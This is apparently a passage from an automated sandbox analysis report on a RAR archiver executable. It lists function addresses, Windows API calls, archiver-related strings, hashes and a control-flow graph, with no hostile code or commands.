                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                            • API String ID: 0-1628410872
                                                                                                                                                                                                                                            • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                            • Instruction ID: 6fc675bb074a8ec6e452606ab1e32cd46027313483f60b2f9b84593f31f74bd4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CC2C363B4C182A1EB64BF2489461BFAE95AF42784FE98035CA4E463C5DFEDE544C370
                                                                                                                                                                                                                                            Function 00007FF702C01884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                            • API String ID: 0-1660254149
                                                                                                                                                                                                                                            • Opcode ID: 9786eab97e9e7573f4f21c10de3a27352e165464d21764c3c99cef1fe973803f
                                                                                                                                                                                                                                            • Instruction ID: fb90b430eb90c97f6a6af5c68a45e30a661abd76dbd8d950561f54019df44aba
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9786eab97e9e7573f4f21c10de3a27352e165464d21764c3c99cef1fe973803f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFE2BF27A08AC2A5EB20EB25CC841FFABA5FF45788F894035DA4D87796DFB9D544C310
                                                                                                                                                                                                                                            Function 00007FF702C448CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C44AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF702C1CC90), ref: 00007FF702C44AF5
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,00007FF702C37E7D), ref: 00007FF702C4492E
                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,00007FF702C37E7D), ref: 00007FF702C4496A
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(?,?,?,00007FF702C37E7D), ref: 00007FF702C44993
                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,00007FF702C37E7D), ref: 00007FF702C4499F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                            • String ID: rarlng.dll
                                                                                                                                                                                                                                            • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                            • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                            • Instruction ID: fb2767e4aa0d7f5de9725b882683837963de13ff9b17e321609fac14f33fb847
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D31AF33A18A42A6FB28AB21EC413EBAB65FF04784FD04035EA4D42A84DFBDD545C720
                                                                                                                                                                                                                                            Function 00007FF702C246EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C24736
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C2476B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C2477A
                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C247A4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C247B2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 869497890-0
                                                                                                                                                                                                                                            • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                            • Instruction ID: 3204191e360afb9c66b48b12332a8e10a03f69e9634a1d07a62dd305f400201f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4741A673608A8166DB28AB25E8402EAA760FF49BB4F804331EA7D477C5DFACD159C710
                                                                                                                                                                                                                                            Function 00007FF702C1901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1815803762-0
                                                                                                                                                                                                                                            • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                            • Instruction ID: a056d579800d101b2fa6dcacfcb9ae312ca5bf08f98a65b2f41d1063e5235bc0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A016D26B0865092E700AB16A85432AAB61EFC5FD0F588031DE4D43B68CFBDD946C740
                                                                                                                                                                                                                                            Function 00007FF702C0B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 751630497-0
                                                                                                                                                                                                                                            • Opcode ID: ddc78f3efe1ff8920d6ce08f229d314778f69db7ccd8907a5870e3e9de4cedf5
                                                                                                                                                                                                                                            • Instruction ID: a7549fb53cb43df036f1d79d9187c6f62f344bbc07e7bfe54e7877bd138acacc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddc78f3efe1ff8920d6ce08f229d314778f69db7ccd8907a5870e3e9de4cedf5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B228123A08682A6E714EF30D8801FFBBA0FF50748F944535DA8D96699DFB8E945C760
                                                                                                                                                                                                                                            Function 00007FF702C2AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c22c5c0b8979b7c17b88d60497a3e69d5a18a8edfd679724e5113879f46e49dc
                                                                                                                                                                                                                                            • Instruction ID: 41f66b43ab50baa03b922f0d86f73ec92aedac2e935927959a00d1abd7828b29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22c5c0b8979b7c17b88d60497a3e69d5a18a8edfd679724e5113879f46e49dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0471C233A0568546D708EF26E8052EE7791FB88B98F044235DF5D8B399DFB8E491C7A0
                                                                                                                                                                                                                                            Function 00007FF702C43EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 635 7ff702c43ea8-7ff702c43f03 call 7ff702c5a5a0 call 7ff702c5c8a0 640 7ff702c43f40-7ff702c43f50 call 7ff702c4a9e8 635->640 641 7ff702c43f05-7ff702c43f3e GetModuleFileNameW call 7ff702c34e14 call 7ff702c4a9c0 635->641 644 7ff702c43f55-7ff702c43f79 call 7ff702c21874 call 7ff702c21e80 640->644 641->644 652 7ff702c44692-7ff702c446c5 call 7ff702c218ac call 7ff702c5a610 644->652 653 7ff702c43f7f-7ff702c43f89 644->653 655 7ff702c43fae-7ff702c43feb call 7ff702c5ec70 * 2 653->655 656 7ff702c43f8b-7ff702c43fac call 7ff702c411c0 * 2 653->656 668 7ff702c43fef-7ff702c43ff3 655->668 656->655 669 7ff702c43ff9-7ff702c4402d call 7ff702c22440 call 7ff702c22150 668->669 670 7ff702c440f2-7ff702c44112 call 7ff702c222e0 call 7ff702c5eb90 668->670 680 7ff702c440bc-7ff702c440e2 call 7ff702c222e0 669->680 681 7ff702c44033 669->681 670->652 679 7ff702c44118-7ff702c44131 call 7ff702c22150 670->679 691 7ff702c44138-7ff702c4414b call 7ff702c5eb90 679->691 692 7ff702c44133-7ff702c44136 679->692 680->668 694 7ff702c440e8-7ff702c440ec 680->694 683 7ff702c4403a-7ff702c4403e 681->683 686 7ff702c44040-7ff702c44044 683->686 687 7ff702c44064-7ff702c44069 683->687 686->687 693 7ff702c44046-7ff702c4405e call 7ff702c62290 686->693 689 7ff702c44097-7ff702c4409f 687->689 690 7ff702c4406b-7ff702c44070 687->690 696 7ff702c440b7 689->696 697 7ff702c440a1 689->697 690->689 695 7ff702c44072-7ff702c44078 690->695 691->652 708 7ff702c44151-7ff702c4416c call 7ff702c4d54c call 7ff702c5eb88 691->708 698 7ff702c4416f-7ff702c441b1 call 7ff702c4a900 call 7ff702c5eb90 692->698 709 7ff702c44060 693->709 710 7ff702c440a3-7ff702c440a7 693->710 694->652 694->670 702 7ff702c4407a-7ff702c44091 call 7ff702c61700 695->702 703 7ff702c44093 695->703 696->680 697->683 717 7ff702c441c0-7ff702c441d5 698->717 718 7ff702c441b3-7ff702c441bb call 7ff702c5eb88 698->718 702->703 715 7ff702c440a9-7ff702c440b5 702->715 703->689 708->698 709->687 710->696 715->680 721 7ff702c441db 717->721 722 7ff702c445f0-7ff702c44624 call 7ff702c43884 call 7ff702c5eb88 * 2 717->722 718->652 726 7ff702c441e1-7ff702c441ee 721->726 759 7ff702c4464a-7ff702c44691 call 7ff702c5ec70 * 2 722->759 760 7ff702c44626-7ff702c44648 call 7ff702c411c0 * 2 722->760 728 7ff702c44508-7ff702c44513 726->728 729 7ff702c441f4-7ff702c441fa 726->729 728->722 731 7ff702c44519-7ff702c44523 728->731 732 7ff702c44208-7ff702c4420e 729->732 733 7ff702c441fc-7ff702c44202 729->733 735 7ff702c44585-7ff702c44589 731->735 736 7ff702c44525-7ff702c4452b 731->736 737 7ff702c443d0-7ff702c443e0 call 7ff702c4a580 732->737 738 7ff702c44214-7ff702c4425c 732->738 733->728 733->732 740 7ff702c4458b-7ff702c4458f 735->740 741 7ff702c445a3-7ff702c445d4 call 7ff702c43884 735->741 743 7ff702c445db-7ff702c445de 736->743 744 7ff702c44531-7ff702c44539 736->744 755 7ff702c444f0-7ff702c44503 737->755 756 7ff702c443e6-7ff702c44414 call 7ff702c4a9e8 call 7ff702c6172c 737->756 745 7ff702c44261-7ff702c44264 738->745 740->741 748 7ff702c44591-7ff702c44597 740->748 741->743 743->722 753 7ff702c445e0-7ff702c445e5 743->753 751 7ff702c4453b-7ff702c4453e 744->751 752 7ff702c44573-7ff702c4457a 744->752 746 7ff702c44268-7ff702c44270 745->746 746->746 754 7ff702c44272-7ff702c44288 call 7ff702c61700 746->754 748->743 758 7ff702c44599-7ff702c445a1 748->758 762 7ff702c4456a-7ff702c44571 751->762 763 7ff702c44540-7ff702c44543 751->763 757 7ff702c4457e-7ff702c44583 752->757 753->726 778 7ff702c4428a-7ff702c44295 754->778 779 7ff702c442a3 754->779 755->728 756->755 787 7ff702c4441a-7ff702c444a9 call 7ff702c4d840 call 7ff702c4a900 call 7ff702c4a8c4 call 7ff702c4a900 call 7ff702c615fc 756->787 757->743 758->743 759->652 760->759 762->757 768 7ff702c44561-7ff702c44568 763->768 769 7ff702c44545-7ff702c44548 763->769 768->757 774 7ff702c4454a-7ff702c4454d 769->774 775 7ff702c44558-7ff702c4455f 769->775 774->748 776 7ff702c4454f-7ff702c44556 774->776 775->757 776->757 778->779 783 7ff702c44297-7ff702c442a1 778->783 785 7ff702c442a7-7ff702c442be 779->785 783->785 785->745 788 7ff702c442c0-7ff702c442c2 785->788 821 7ff702c444ab-7ff702c444bb 787->821 822 7ff702c444bf-7ff702c444cf 787->822 790 7ff702c442e6 788->790 791 7ff702c442c4-7ff702c442d6 call 7ff702c4a900 788->791 790->737 794 7ff702c442ec 790->794 796 7ff702c442db-7ff702c442e1 791->796 797 7ff702c442f1-7ff702c442f7 794->797 799 7ff702c445d6 796->799 800 7ff702c442f9-7ff702c442fe 797->800 801 7ff702c44300-7ff702c44303 797->801 799->743 800->801 802 7ff702c44305-7ff702c44314 800->802 801->797 804 7ff702c4433d-7ff702c44347 802->804 805 7ff702c44316-7ff702c44320 802->805 808 7ff702c445ea-7ff702c445ef call 7ff702c5a774 804->808 809 7ff702c4434d-7ff702c44378 call 7ff702c4d840 804->809 807 7ff702c44323-7ff702c44327 805->807 807->804 812 7ff702c44329-7ff702c4433b 807->812 808->722 819 7ff702c4437a-7ff702c44399 call 7ff702c61764 809->819 820 7ff702c4439e-7ff702c443cb call 7ff702c4470c 809->820 812->804 812->807 819->796 820->796 821->822 825 7ff702c444d2-7ff702c444d8 822->825 828 7ff702c444da-7ff702c444e5 825->828 829 7ff702c444eb-7ff702c444ee 825->829 828->799 828->829 829->825
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                            • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                            • Opcode ID: 67572efc140f081c2830ab2ac114563b4482ba77154e748fab887036bccabc43
                                                                                                                                                                                                                                            • Instruction ID: 644ffc6ead4ba0149d6c74b9384ee0be3881d6398dda28edada75000ac615010
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67572efc140f081c2830ab2ac114563b4482ba77154e748fab887036bccabc43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7722A023A18A82A5EB34EB15DC402BBAB62FF44784FD04135EA4E87695EFFCE544C350
                                                                                                                                                                                                                                            Function 00007FF702C14FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
